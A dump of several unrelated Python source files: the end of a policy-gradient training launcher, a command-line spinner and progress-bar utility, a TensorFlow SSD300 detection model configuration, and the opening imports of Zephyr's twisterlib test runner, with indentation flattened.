parser.add_argument('--n_iter', '-n', type=int, default=100)
parser.add_argument('--batch_size', '-b', type=int, default=1000)
parser.add_argument('--ep_len', '-ep', type=float, default=-1.)
parser.add_argument('--learning_rate', '-lr', type=float, default=5e-3)
parser.add_argument('--reward_to_go', '-rtg', action='store_true')
parser.add_argument('--dont_normalize_advantages', '-dna', action='store_true')
parser.add_argument('--nn_baseline', '-bl', action='store_true')
parser.add_argument('--seed', type=int, default=1)
parser.add_argument('--n_experiments', '-e', type=int, default=1)
parser.add_argument('--n_layers', '-l', type=int, default=2)
parser.add_argument('--size', '-s', type=int, default=64)
args = parser.parse_args()
if not(os.path.exists('data')):
os.makedirs('data')
logdir = args.exp_name + '_' + args.env_name + '_' + time.strftime("%d-%m-%Y_%H-%M-%S")
logdir = os.path.join('data', logdir)
if not(os.path.exists(logdir)):
os.makedirs(logdir)
max_path_length = args.ep_len if args.ep_len > 0 else None
processes = []
for e in range(args.n_experiments):
seed = args.seed + 10*e
print('Running experiment with seed %d'%seed)
def train_func():
train_PG(
exp_name=args.exp_name,
env_name=args.env_name,
n_iter=args.n_iter,
gamma=args.discount,
min_timesteps_per_batch=args.batch_size,
max_path_length=max_path_length,
learning_rate=args.learning_rate,
reward_to_go=args.reward_to_go,
animate=args.render,
logdir=os.path.join(logdir,'%d'%seed),
normalize_advantages=not(args.dont_normalize_advantages),
nn_baseline=args.nn_baseline,
seed=seed,
n_layers=args.n_layers,
size=args.size
)
# # Awkward hacky process runs, because Tensorflow does not like
# # repeatedly calling train_PG in the same thread.
p = Process(target=train_func, args=tuple())
p.start()
processes.append(p)
# if you comment in the line below, then the loop will block
# until this process finishes
# p.join()
for p in processes:
p.join()
if __name__ == "__main__":
main()
|
cmdanime.py
|
#!/usr/bin/env python3
# fileencoding=utf-8
'''
cmdanime.py
~~~~~~~~~~~
cmdanime.py provides command-line animation. When yor start to run a long calculation in python,
if there is no output in command-line, you are warried about whichever the program starts or not.
In that case, cmdanime.CmdAnimation show animation in command-line.
.. code-block:: python
from easyutil import CmdAnimation
## For Command Line Animation.
anm = CmdAnimation()
anm.start()
# Your function here.
anm.end()
.. autoclass:: easyutil.Signal
:members:
.. autoclass:: easyutil.CmdAnimation
:members:
'''
import os
import sys
import time
import threading
import itertools
from easyutil import estring as es
class easyThread(threading.Thread):
def __init__(self, func, args):
threading.Thread.__init__(self)
self.value = 0
self.func = func
self.args = args
def run(self):
self.value = self.func(self.args[1])
def get_value(self):
return self.value
class Signal:
go = True
class CmdAnimation:
'''
.. code-block::python
:emphasize-lines: 3,5
'''
def __init__(self, anim_type='spin', filename='', size=0, msg='', msg2=''):
"""
:anim_type[str]: [spin, progress]
:filename[str]: for showing progress bar.
:full_size[int]: for showing progress bar.
"""
self.full_size = size
self.signal = Signal()
self.duration_time = 0
self.filename = filename
self.types = {"spin": self._spin, "progress": self._progress}
self.func = self.types[anim_type]
self.msg = msg
self.msg2 = msg2
self.msg2_size = 20
def start(self):
'''
start() starts animation.
'''
self.anim = threading.Thread(target=self.func, args=(self.msg, self.msg2, self.signal))
self.anim.start()
def _spin(self, msg, msg2, signal):
# Show Spin.
spins = '|/-\\'
spins2 = '/-\\|'
spins3 = '-\\|/'
spins4 = '\\|/-'
sys.stdout.write(msg)
for i in itertools.cycle(range(4)):
out = "{}\t{}{}{}{}".format(msg2, spins[i], spins2[i], spins3[i], spins4[i])
sys.stdout.write(out)
sys.stdout.flush()
sys.stdout.write('\x08'*len(out))
time.sleep(.1)
if not signal.go:
break
sys.stdout.write('\x08'*(4+len(msg)))
def _progress(self, msg, msg2, signal):
sys.stdout.write(msg)
while True:
try:
now_size = self._get_size(self.filename)
except:
continue
self._showProgress(msg2, now_size)
if self.full_size == now_size:
break
def _showProgress(self, msg2, now_size):
# Show progress bar.
out = msg2 + self._get_bar(now_size)
sys.stdout.write(out)
time.sleep(.2)
sys.stdout.flush()
sys.stdout.write('\x08'*len(out))
time.sleep(.1)
def _get_bar(self, now_size):
_space = ' '
_bar = '='
_arrow = '>'
bar_size = 60
ratio = now_size / self.full_size
arrow = _bar * (int((ratio) * bar_size) - 1) + _arrow
space = _space * (bar_size - len(arrow))
percent = '{0:5.2f}%'.format(ratio * 100)
out = '['+ arrow + space + ']' + percent
return out
def _get_size(self, filename):
'''
_get_size(): get a filesize form a filename and return the filsesize.
'''
return os.path.getsize(os.path.abspath(filename))
def end(self):
'''
end() stop animation.
'''
self.signal.go = False
self.anim.join()
class MultiCmdAnimation(CmdAnimation):
'''
This class is an extension of CmdAnimation and provide a command-line animation in multipule line.
.. code-block::python
:emphasize-lines: 3,5
'''
def __init__(self, anim_type='progress', filenames=[], sizes=[], msgs=[], msgs2=[]):
"""
Now only suppoting progress mode.
:anim_type[str]: [spin, progress]
:filenames[str list]: for showing progress bar.
:full_sizes[int list]: for showing progress bar.
:full_sizes[int list]: for showing progress bar.
"""
CmdAnimation.__init__(self)
self.types = {"progress": self._progress}
self.func = self.types[anim_type]
self.filenames = filenames
self.msg = ['' for i in range(len(msgs2))]
self.msg2 = msgs2
self.signal = Signal()
self.full_sizes = sizes
def start(self):
'''
start() starts animation.
'''
self.anim = threading.Thread(target=self.func, args=(self.msg, self.msg2, self.signal))
self.anim.start()
def _progress(self, msg, msg2, signal):
_msg = ' '
get_names = [ easyThread(func=self._get_size, args=(_msg, filename))
for filename in self.filenames ]
[ get_names[i].start() for i, dump in enumerate(get_names) ]
while True:
now_sizes = [ get_names[i].get_value() for i, _dump in enumerate(get_names) ]
self._showProgress(msg2, now_sizes)
[ get_names[i].join() for i, dump in enumerate(get_names) if now_sizes[i] == self.full_sizes[i]]
def _showProgress(self, msg2, now_sizes):
# Show progress bar.
out = ''
for i, now_size in enumerate(now_sizes):
header = es.constant_width(msg2[i], 50)
out += header + self._get_bar(now_size, self.full_sizes[i])
sys.stdout.write(out)
time.sleep(.3)
sys.stdout.flush()
sys.stdout.write('\x08'*(len(out)))
time.sleep(.1)
def _get_bar(self, now_size, full_size):
_space = ' '
_bar = '='
_arrow = '>'
bar_size = 60
ratio = now_size / full_size
arrow = _bar * (int((ratio) * bar_size) - 1) + _arrow
space = _space * (bar_size - len(arrow))
percent = '{0:5.2f}% |'.format(ratio * 100)
out = '['+ arrow + space + ']' + percent
return out
if __name__ == "__main__":
"""
msgs = ["msg:hello"+str(i) for i in range(4)]
msgs2 = [u"msg2:helloあ" for i in range(4)]
files = ["hello"+str(i)+'.txt' for i in range(4)]
sizes = [10*4 for i in range(4)]
anm = MultiCmdAnimation("progress", filenames=files, msgs2=msgs2, sizes=sizes)
anm.start()
anm.end()
"""
|
ssd_model.py
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""SSD300 Model Configuration.
References:
Wei Liu, Dragomir Anguelov, Dumitru Erhan, Christian Szegedy, Scott Reed,
Cheng-Yang Fu, Alexander C. Berg
SSD: Single Shot MultiBox Detector
arXiv:1512.02325
Ported from MLPerf reference implementation:
https://github.com/mlperf/reference/tree/ssd/single_stage_detector/ssd
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import multiprocessing
import os
import re
import threading
import tensorflow as tf
import constants
import mlperf
import ssd_constants
from cnn_util import log_fn
from models import model as model_lib
from models import resnet_model
BACKBONE_MODEL_SCOPE_NAME = 'resnet34_backbone'
class SSD300Model(model_lib.CNNModel):
"""Single Shot Multibox Detection (SSD) model for 300x300 image datasets."""
def __init__(self, label_num=ssd_constants.NUM_CLASSES, batch_size=32,
learning_rate=1e-3, backbone='resnet34', params=None):
super(SSD300Model, self).__init__('ssd300', 300, batch_size, learning_rate,
params=params)
# For COCO dataset, 80 categories + 1 background = 81 labels
self.label_num = label_num
# Currently only support ResNet-34 as backbone model
if backbone != 'resnet34':
raise ValueError('Invalid backbone model %s for SSD.' % backbone)
mlperf.logger.log(key=mlperf.tags.BACKBONE, value=backbone)
# Number of channels and default boxes associated with the following layers:
# ResNet34 layer, Conv7, Conv8_2, Conv9_2, Conv10_2, Conv11_2
self.out_chan = [256, 512, 512, 256, 256, 256]
mlperf.logger.log(key=mlperf.tags.LOC_CONF_OUT_CHANNELS,
value=self.out_chan)
# Number of default boxes from layers of different scales
# 38x38x4, 19x19x6, 10x10x6, 5x5x6, 3x3x4, 1x1x4
self.num_dboxes = [4, 6, 6, 6, 4, 4]
mlperf.logger.log(key=mlperf.tags.NUM_DEFAULTS_PER_CELL,
value=self.num_dboxes)
# TODO(haoyuzhang): in order to correctly restore in replicated mode, need
# to create a saver for each tower before graph is finalized. Use variable
# manager for better efficiency.
self.backbone_savers = []
# Collected predictions for eval stage. It maps each image id in eval
# dataset to a dict containing the following information:
# source_id: raw ID of image
# raw_shape: raw shape of image
# pred_box: encoded box coordinates of prediction
# pred_scores: scores of classes in prediction
self.predictions = {}
# Global step when predictions are collected.
self.eval_global_step = 0
# Average precision. In asynchronous eval mode, this is the latest AP we
# get so far and may not be the results at current eval step.
self.eval_coco_ap = 0
# Process, queues, and thread for asynchronous evaluation. When enabled,
# create a separte process (async_eval_process) that continously pull
# intermediate results from the predictions queue (a multiprocessing queue),
# process them, and push final results into results queue (another
# multiprocessing queue). The main thread is responsible to push message
# into predictions queue, and start a separate thread to continuously pull
# messages from results queue to update final results.
# Message in predictions queue should be a tuple of two elements:
# (evaluation step, predictions)
# Message in results queue should be a tuple of two elements:
# (evaluation step, final results)
self.async_eval_process = None
self.async_eval_predictions_queue = None
self.async_eval_results_queue = None
self.async_eval_results_getter_thread = None
# The MLPerf reference uses a starting lr of 1e-3 at bs=32.
self.base_lr_batch_size = 32
def skip_final_affine_layer(self):
return True
def add_backbone_model(self, cnn):
# --------------------------------------------------------------------------
# Resnet-34 backbone model -- modified for SSD
# --------------------------------------------------------------------------
# Input 300x300, output 150x150
cnn.conv(64, 7, 7, 2, 2, mode='SAME_RESNET', use_batch_norm=True)
cnn.mpool(3, 3, 2, 2, mode='SAME')
resnet34_layers = [3, 4, 6, 3]
version = 'v1'
# ResNet-34 block group 1
# Input 150x150, output 75x75
for i in range(resnet34_layers[0]):
# Last argument forces residual_block to use projection shortcut, even
# though the numbers of input and output channels are equal
resnet_model.residual_block(cnn, 64, 1, version)
# ResNet-34 block group 2
# Input 75x75, output 38x38
for i in range(resnet34_layers[1]):
stride = 2 if i == 0 else 1
resnet_model.residual_block(cnn, 128, stride, version, i == 0)
# ResNet-34 block group 3
# This block group is modified: first layer uses stride=1 so that the image
# size does not change in group of layers
# Input 38x38, output 38x38
for i in range(resnet34_layers[2]):
# The following line is intentionally commented out to differentiate from
# the original ResNet-34 model
# stride = 2 if i == 0 else 1
resnet_model.residual_block(cnn, 256, stride, version, i == 0)
# ResNet-34 block group 4: removed final block group
# The following 3 lines are intentially commented out to differentiate from
# the original ResNet-34 model
# for i in range(resnet34_layers[3]):
# stride = 2 if i == 0 else 1
# resnet_model.residual_block(cnn, 512, stride, version, i == 0)
def add_inference(self, cnn):
cnn.use_batch_norm = True
cnn.batch_norm_config = {'decay': ssd_constants.BATCH_NORM_DECAY,
'epsilon': ssd_constants.BATCH_NORM_EPSILON,
'scale': True}
with tf.variable_scope(BACKBONE_MODEL_SCOPE_NAME):
self.add_backbone_model(cnn)
# --------------------------------------------------------------------------
# SSD additional layers
# --------------------------------------------------------------------------
def add_ssd_layer(cnn, depth, k_size, stride, mode):
return cnn.conv(depth, k_size, k_size, stride, stride,
mode=mode, use_batch_norm=False,
kernel_initializer=tf.contrib.layers.xavier_initializer())
# Activations for feature maps of different layers
self.activations = [cnn.top_layer]
# Conv7_1, Conv7_2
# Input 38x38, output 19x19
add_ssd_layer(cnn, 256, 1, 1, 'valid')
self.activations.append(add_ssd_layer(cnn, 512, 3, 2, 'same'))
# Conv8_1, Conv8_2
# Input 19x19, output 10x10
add_ssd_layer(cnn, 256, 1, 1, 'valid')
self.activations.append(add_ssd_layer(cnn, 512, 3, 2, 'same'))
# Conv9_1, Conv9_2
# Input 10x10, output 5x5
add_ssd_layer(cnn, 128, 1, 1, 'valid')
self.activations.append(add_ssd_layer(cnn, 256, 3, 2, 'same'))
# Conv10_1, Conv10_2
# Input 5x5, output 3x3
add_ssd_layer(cnn, 128, 1, 1, 'valid')
self.activations.append(add_ssd_layer(cnn, 256, 3, 1, 'valid'))
# Conv11_1, Conv11_2
# Input 3x3, output 1x1
add_ssd_layer(cnn, 128, 1, 1, 'valid')
self.activations.append(add_ssd_layer(cnn, 256, 3, 1, 'valid'))
self.loc = []
self.conf = []
for nd, ac, oc in zip(self.num_dboxes, self.activations, self.out_chan):
l = cnn.conv(nd * 4, 3, 3, 1, 1, input_layer=ac,
num_channels_in=oc, activation=None, use_batch_norm=False,
kernel_initializer=tf.contrib.layers.xavier_initializer())
scale = l.get_shape()[-1]
# shape = [batch_size, nd * 4, scale, scale]
l = tf.reshape(l, [self.batch_size, nd, 4, scale, scale])
# shape = [batch_size, nd, 4, scale, scale]
l = tf.transpose(l, [0, 1, 3, 4, 2])
# shape = [batch_size, nd, scale, scale, 4]
self.loc.append(tf.reshape(l, [self.batch_size, -1, 4]))
# shape = [batch_size, nd * scale * scale, 4]
c = cnn.conv(nd * self.label_num, 3, 3, 1, 1, input_layer=ac,
num_channels_in=oc, activation=None, use_batch_norm=False,
kernel_initializer=tf.contrib.layers.xavier_initializer())
# shape = [batch_size, nd * label_num, scale, scale]
c = tf.reshape(c, [self.batch_size, nd, self.label_num, scale, scale])
# shape = [batch_size, nd, label_num, scale, scale]
c = tf.transpose(c, [0, 1, 3, 4, 2])
# shape = [batch_size, nd, scale, scale, label_num]
self.conf.append(tf.reshape(c, [self.batch_size, -1, self.label_num]))
# shape = [batch_size, nd * scale * scale, label_num]
# Shape of locs: [batch_size, NUM_SSD_BOXES, 4]
# Shape of confs: [batch_size, NUM_SSD_BOXES, label_num]
locs, confs = tf.concat(self.loc, 1), tf.concat(self.conf, 1)
# Pack location and confidence outputs into a single output layer
# Shape of logits: [batch_size, NUM_SSD_BOXES, 4+label_num]
logits = tf.concat([locs, confs], 2)
cnn.top_layer = logits
cnn.top_size = 4 + self.label_num
return cnn.top_layer
def get_learning_rate(self, global_step, batch_size):
rescaled_lr = self.get_scaled_base_learning_rate(batch_size)
# Defined in MLPerf reference model
boundaries = [160000, 200000]
boundaries = [b * self.base_lr_batch_size // batch_size for b in boundaries]
decays = [1, 0.1, 0.01]
learning_rates = [rescaled_lr * d for d in decays]
lr = tf.train.piecewise_constant(global_step, boundaries, learning_rates)
warmup_steps = int(118287 / batch_size * 5)
warmup_lr = (
rescaled_lr * tf.cast(global_step, tf.float32) / tf.cast(
warmup_steps, tf.float32))
return tf.cond(global_step < warmup_steps, lambda: warmup_lr, lambda: lr)
def get_scaled_base_learning_rate(self, batch_size):
"""Calculates base learning rate for creating lr schedule.
In replicated mode, gradients are summed rather than averaged which, with
the sgd and momentum optimizers, increases the effective learning rate by
lr * num_gpus. Dividing the base lr by num_gpus negates the increase.
Args:
batch_size: Total batch-size.
Returns:
Base learning rate to use to create lr schedule.
"""
base_lr = self.learning_rate
if self.params.variable_update == 'replicated':
base_lr = self.learning_rate / self.params.num_gpus
scaled_lr = base_lr * (batch_size / self.base_lr_batch_size)
return scaled_lr
def _collect_backbone_vars(self):
backbone_vars = tf.get_collection(
tf.GraphKeys.GLOBAL_VARIABLES, scope='.*'+ BACKBONE_MODEL_SCOPE_NAME)
var_list = {}
# Assume variables in the checkpoint are following the naming convention of
# a model checkpoint trained with TF official model
# TODO(haoyuzhang): the following variable name parsing is hacky and easy
# to break if there is change in naming convention of either benchmarks or
# official models.
for v in backbone_vars:
# conv2d variable example (model <-- checkpoint):
# v/cg/conv24/conv2d/kernel:0 <-- conv2d_24/kernel
if 'conv2d' in v.name:
re_match = re.search(r'conv(\d+)/conv2d/(.+):', v.name)
if re_match:
layer_id = int(re_match.group(1))
param_name = re_match.group(2)
vname_in_ckpt = self._var_name_in_official_model_ckpt(
'conv2d', layer_id, param_name)
var_list[vname_in_ckpt] = v
# batchnorm varariable example:
# v/cg/conv24/batchnorm25/gamma:0 <-- batch_normalization_25/gamma
elif 'batchnorm' in v.name:
re_match = re.search(r'batchnorm(\d+)/(.+):', v.name)
if re_match:
layer_id = int(re_match.group(1))
param_name = re_match.group(2)
vname_in_ckpt = self._var_name_in_official_model_ckpt(
'batch_normalization', layer_id, param_name)
var_list[vname_in_ckpt] = v
return var_list
def _var_name_in_official_model_ckpt(self, layer_name, layer_id, param_name):
"""Return variable names according to convention in TF official models."""
vname_in_ckpt = layer_name
if layer_id > 0:
vname_in_ckpt += '_' + str(layer_id)
vname_in_ckpt += '/' + param_name
return vname_in_ckpt
def loss_function(self, inputs, build_network_result):
logits = build_network_result.logits
# Unpack model output back to locations and confidence scores of predictions
# Shape of pred_loc: [batch_size, NUM_SSD_BOXES, 4]
# Shape of pred_label: [batch_size, NUM_SSD_BOXES, label_num]
pred_loc, pred_label = tf.split(logits, [4, self.label_num], 2)
# Shape of gt_loc: [batch_size, NUM_SSD_BOXES, 4]
# Shape of gt_label: [batch_size, NUM_SSD_BOXES, 1]
# Shape of num_gt: [batch_size]
_, gt_loc, gt_label, num_gt = inputs
gt_label = tf.cast(gt_label, tf.int32)
box_loss = self._localization_loss(pred_loc, gt_loc, gt_label, num_gt)
class_loss = self._classification_loss(pred_label, gt_label, num_gt)
tf.summary.scalar('box_loss', tf.reduce_mean(box_loss))
tf.summary.scalar('class_loss', tf.reduce_mean(class_loss))
return class_loss + box_loss
def _localization_loss(self, pred_loc, gt_loc, gt_label, num_matched_boxes):
"""Computes the localization loss.
Computes the localization loss using smooth l1 loss.
Args:
pred_loc: a flatten tensor that includes all predicted locations. The
shape is [batch_size, num_anchors, 4].
gt_loc: a tensor representing box regression targets in
[batch_size, num_anchors, 4].
gt_label: a tensor that represents the classification groundtruth targets.
The shape is [batch_size, num_anchors, 1].
num_matched_boxes: the number of anchors that are matched to a groundtruth
targets, used as the loss normalizater. The shape is [batch_size].
Returns:
box_loss: a float32 representing total box regression loss.
"""
mask = tf.greater(tf.squeeze(gt_label), 0)
float_mask = tf.cast(mask, tf.float32)
smooth_l1 = tf.reduce_sum(tf.losses.huber_loss(
gt_loc, pred_loc,
reduction=tf.losses.Reduction.NONE
), axis=2)
smooth_l1 = tf.multiply(smooth_l1, float_mask)
box_loss = tf.reduce_sum(smooth_l1, axis=1)
return tf.reduce_mean(box_loss / num_matched_boxes)
def _classification_loss(self, pred_label, gt_label, num_matched_boxes):
"""Computes the classification loss.
Computes the classification loss with hard negative mining.
Args:
pred_label: a flatten tensor that includes all predicted class. The shape
is [batch_size, num_anchors, num_classes].
gt_label: a tensor that represents the classification groundtruth targets.
The shape is [batch_size, num_anchors, 1].
num_matched_boxes: the number of anchors that are matched to a groundtruth
targets. This is used as the loss normalizater.
Returns:
box_loss: a float32 representing total box regression loss.
"""
cross_entropy = tf.losses.sparse_softmax_cross_entropy(
gt_label, pred_label, reduction=tf.losses.Reduction.NONE)
mask = tf.greater(tf.squeeze(gt_label), 0)
float_mask = tf.cast(mask, tf.float32)
# Hard example mining
neg_masked_cross_entropy = cross_entropy * (1 - float_mask)
relative_position = tf.contrib.framework.argsort(
tf.contrib.framework.argsort(
neg_masked_cross_entropy, direction='DESCENDING'))
num_neg_boxes = tf.minimum(
tf.to_int32(num_matched_boxes) * ssd_constants.NEGS_PER_POSITIVE,
ssd_constants.NUM_SSD_BOXES)
top_k_neg_mask = tf.cast(tf.less(
relative_position,
tf.tile(num_neg_boxes[:, tf.newaxis], (1, ssd_constants.NUM_SSD_BOXES))
), tf.float32)
class_loss = tf.reduce_sum(
tf.multiply(cross_entropy, float_mask + top_k_neg_mask), axis=1)
return tf.reduce_mean(class_loss / num_matched_boxes)
def add_backbone_saver(self):
# Create saver with mapping from variable names in checkpoint of backbone
# model to variables in SSD model
backbone_var_list = self._collect_backbone_vars()
self.backbone_savers.append(tf.train.Saver(backbone_var_list))
def load_backbone_model(self, sess, backbone_model_path):
for saver in self.backbone_savers:
saver.restore(sess, backbone_model_path)
def get_input_data_types(self, subset):
if subset == 'validation':
return [self.data_type, tf.float32, tf.float32, tf.float32, tf.int32]
return [self.data_type, tf.float32, tf.float32, tf.float32]
def get_input_shapes(self, subset):
"""Return encoded tensor shapes for train and eval data respectively."""
if subset == 'validation':
# Validation data shapes:
# 1. images
# 2. ground truth locations of boxes
# 3. ground truth classes of objects in boxes
# 4. source image IDs
# 5. raw image shapes
return [
[self.batch_size, self.image_size, self.image_size, self.depth],
[self.batch_size, ssd_constants.MAX_NUM_EVAL_BOXES, 4],
[self.batch_size, ssd_constants.MAX_NUM_EVAL_BOXES, 1],
[self.batch_size],
[self.batch_size, 3],
]
# Training data shapes:
# 1. images
# 2. ground truth locations of boxes
# 3. ground truth classes of objects in boxes
# 4. numbers of objects in images
return [
[self.batch_size, self.image_size, self.image_size, self.depth],
[self.batch_size, ssd_constants.NUM_SSD_BOXES, 4],
[self.batch_size, ssd_constants.NUM_SSD_BOXES, 1],
[self.batch_size]
]
def accuracy_function(self, inputs, build_network_result):
"""Returns the ops to measure the mean precision of the model."""
try:
import ssd_dataloader # pylint: disable=g-import-not-at-top
from object_detection.box_coders import faster_rcnn_box_coder # pylint: disable=g-import-not-at-top
from object_detection.core import box_coder # pylint: disable=g-import-not-at-top
from object_detection.core import box_list # pylint: disable=g-import-not-at-top
except ImportError:
raise ImportError('To use the COCO dataset, you must clone the '
'repo https://github.com/tensorflow/models and add '
'tensorflow/models and tensorflow/models/research to '
'the PYTHONPATH, and compile the protobufs by '
'following https://github.com/tensorflow/models/blob/'
'master/research/object_detection/g3doc/installation.md'
'#protobuf-compilation ; To evaluate using COCO'
'metric, download and install Python COCO API from'
'https://github.com/cocodataset/cocoapi')
# Unpack model output back to locations and confidence scores of predictions
# pred_locs: relative locations (coordiates) of objects in all SSD boxes
# shape: [batch_size, NUM_SSD_BOXES, 4]
# pred_labels: confidence scores of objects being of all categories
# shape: [batch_size, NUM_SSD_BOXES, label_num]
pred_locs, pred_labels = tf.split(build_network_result.logits,
[4, self.label_num], 2)
ssd_box_coder = faster_rcnn_box_coder.FasterRcnnBoxCoder(
scale_factors=ssd_constants.BOX_CODER_SCALES)
anchors = box_list.BoxList(
tf.convert_to_tensor(ssd_dataloader.DefaultBoxes()('ltrb')))
pred_boxes = box_coder.batch_decode(
encoded_boxes=pred_locs, box_coder=ssd_box_coder, anchors=anchors)
pred_scores = tf.nn.softmax(pred_labels, axis=2)
# TODO(haoyuzhang): maybe use `gt_boxes` and `gt_classes` for visualization.
_, gt_boxes, gt_classes, source_id, raw_shape = inputs # pylint: disable=unused-variable
return {
(constants.UNREDUCED_ACCURACY_OP_PREFIX +
ssd_constants.PRED_BOXES): pred_boxes,
(constants.UNREDUCED_ACCURACY_OP_PREFIX +
ssd_constants.PRED_SCORES): pred_scores,
# TODO(haoyuzhang): maybe use these values for visualization.
# constants.UNREDUCED_ACCURACY_OP_PREFIX+'gt_boxes': gt_boxes,
# constants.UNREDUCED_ACCURACY_OP_PREFIX+'gt_classes': gt_classes,
(constants.UNREDUCED_ACCURACY_OP_PREFIX +
ssd_constants.SOURCE_ID): source_id,
(constants.UNREDUCED_ACCURACY_OP_PREFIX +
ssd_constants.RAW_SHAPE): raw_shape
}
def postprocess(self, results):
"""Postprocess results returned from model."""
try:
import coco_metric # pylint: disable=g-import-not-at-top
except ImportError:
raise ImportError('To use the COCO dataset, you must clone the '
'repo https://github.com/tensorflow/models and add '
'tensorflow/models and tensorflow/models/research to '
'the PYTHONPATH, and compile the protobufs by '
'following https://github.com/tensorflow/models/blob/'
'master/research/object_detection/g3doc/installation.md'
'#protobuf-compilation ; To evaluate using COCO'
'metric, download and install Python COCO API from'
'https://github.com/cocodataset/cocoapi')
pred_boxes = results[ssd_constants.PRED_BOXES]
pred_scores = results[ssd_constants.PRED_SCORES]
# TODO(haoyuzhang): maybe use these values for visualization.
# gt_boxes = results['gt_boxes']
# gt_classes = results['gt_classes']
source_id = results[ssd_constants.SOURCE_ID]
raw_shape = results[ssd_constants.RAW_SHAPE]
# COCO evaluation requires processing COCO_NUM_VAL_IMAGES exactly once. Due
# to rounding errors (i.e., COCO_NUM_VAL_IMAGES % batch_size != 0), setting
# `num_eval_epochs` to 1 is not enough and will often miss some images. We
# expect user to set `num_eval_epochs` to >1, which will leave some unused
# images from previous steps in `predictions`. Here we check if we are doing
# eval at a new global step.
if results['global_step'] > self.eval_global_step:
self.eval_global_step = results['global_step']
self.predictions.clear()
for i, sid in enumerate(source_id):
self.predictions[int(sid)] = {
ssd_constants.PRED_BOXES: pred_boxes[i],
ssd_constants.PRED_SCORES: pred_scores[i],
ssd_constants.SOURCE_ID: source_id[i],
ssd_constants.RAW_SHAPE: raw_shape[i]
}
# COCO metric calculates mAP only after a full epoch of evaluation. Return
# dummy results for top_N_accuracy to be compatible with benchmar_cnn.py.
if len(self.predictions) >= ssd_constants.COCO_NUM_VAL_IMAGES:
log_fn('Got results for all {:d} eval examples. Calculate mAP...'.format(
ssd_constants.COCO_NUM_VAL_IMAGES))
annotation_file = os.path.join(self.params.data_dir,
ssd_constants.ANNOTATION_FILE)
# Size of predictions before decoding about 15--30GB, while size after
# decoding is 100--200MB. When using async eval mode, decoding takes
# 20--30 seconds of main thread time but is necessary to avoid OOM during
# inter-process communication.
decoded_preds = coco_metric.decode_predictions(self.predictions.values())
self.predictions.clear()
if self.params.collect_eval_results_async:
def _eval_results_getter():
"""Iteratively get eval results from async eval process."""
while True:
step, eval_results = self.async_eval_results_queue.get()
self.eval_coco_ap = eval_results['COCO/AP']
mlperf.logger.log_eval_accuracy(
self.eval_coco_ap, step, self.batch_size * self.params.num_gpus,
ssd_constants.COCO_NUM_TRAIN_IMAGES)
if self.reached_target():
# Reached target, clear all pending messages in predictions queue
# and insert poison pill to stop the async eval process.
while not self.async_eval_predictions_queue.empty():
self.async_eval_predictions_queue.get()
self.async_eval_predictions_queue.put('STOP')
break
if not self.async_eval_process:
# Limiting the number of messages in predictions queue to prevent OOM.
# Each message (predictions data) can potentially consume a lot of
# memory, and normally there should only be few messages in the queue.
# If often blocked on this, consider reducing eval frequency.
self.async_eval_predictions_queue = multiprocessing.Queue(2)
self.async_eval_results_queue = multiprocessing.Queue()
# Reason to use a Process as opposed to Thread is mainly the
# computationally intensive eval runner. Python multithreading is not
# truly running in parallel, a runner thread would get significantly
# delayed (or alternatively delay the main thread).
self.async_eval_process = multiprocessing.Process(
target=coco_metric.async_eval_runner,
args=(self.async_eval_predictions_queue,
self.async_eval_results_queue,
annotation_file))
self.async_eval_process.daemon = True
self.async_eval_process.start()
self.async_eval_results_getter_thread = threading.Thread(
target=_eval_results_getter, args=())
self.async_eval_results_getter_thread.daemon = True
self.async_eval_results_getter_thread.start()
self.async_eval_predictions_queue.put(
(self.eval_global_step, decoded_preds))
return {'top_1_accuracy': 0, 'top_5_accuracy': 0.}
eval_results = coco_metric.compute_map(decoded_preds, annotation_file)
self.eval_coco_ap = eval_results['COCO/AP']
ret = {'top_1_accuracy': self.eval_coco_ap, 'top_5_accuracy': 0.}
for metric_key, metric_value in eval_results.items():
ret[constants.SIMPLE_VALUE_RESULT_PREFIX + metric_key] = metric_value
mlperf.logger.log_eval_accuracy(self.eval_coco_ap, self.eval_global_step,
self.batch_size * self.params.num_gpus,
ssd_constants.COCO_NUM_TRAIN_IMAGES)
return ret
log_fn('Got {:d} out of {:d} eval examples.'
' Waiting for the remaining to calculate mAP...'.format(
len(self.predictions), ssd_constants.COCO_NUM_VAL_IMAGES))
return {'top_1_accuracy': self.eval_coco_ap, 'top_5_accuracy': 0.}
def get_synthetic_inputs(self, input_name, nclass):
"""Generating synthetic data matching real data shape and type."""
inputs = tf.random_uniform(
self.get_input_shapes('train')[0], dtype=self.data_type)
inputs = tf.contrib.framework.local_variable(inputs, name=input_name)
boxes = tf.random_uniform(
[self.batch_size, ssd_constants.NUM_SSD_BOXES, 4], dtype=tf.float32)
classes = tf.random_uniform(
[self.batch_size, ssd_constants.NUM_SSD_BOXES, 1], dtype=tf.float32)
nboxes = tf.random_uniform(
[self.batch_size], minval=1, maxval=10, dtype=tf.float32)
return (inputs, boxes, classes, nboxes)
def reached_target(self):
return (self.params.stop_at_top_1_accuracy and
self.eval_coco_ap >= self.params.stop_at_top_1_accuracy)
|
twisterlib.py
|
#!/usr/bin/env python3
# vim: set syntax=python ts=4 :
#
# Copyright (c) 2018 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import os
import contextlib
import string
import mmap
import math
import sys
import re
import subprocess
import select
import shutil
import shlex
import signal
import hashlib
import threading
from datetime import datetime
from collections import OrderedDict
import queue
import time
import csv
import glob
import random
import xml.etree.ElementTree as ET
import logging
from pathlib import Path
from distutils.spawn import find_executable
import colorama
from colorama import Fore
import pickle
import platform
import yaml
import json
from multiprocessing import Lock, Process, Value
from typing import List
try:
# Use the C LibYAML parser if available, rather than the Python parser.
# It's much faster.
from yaml import CSafeLoader as SafeLoader
from yaml import CDumper as Dumper
except ImportError:
from yaml import SafeLoader, Dumper
try:
import serial
except ImportError:
print("Install pyserial python module with pip to use --device-testing option.")
try:
from tabulate import tabulate
except ImportError:
print("Install tabulate python module with pip to use --device-testing option.")
try:
import psutil
except ImportError:
print("Install psutil python module with pip to run in Qemu.")
try:
import pty
except ImportError as capture_error:
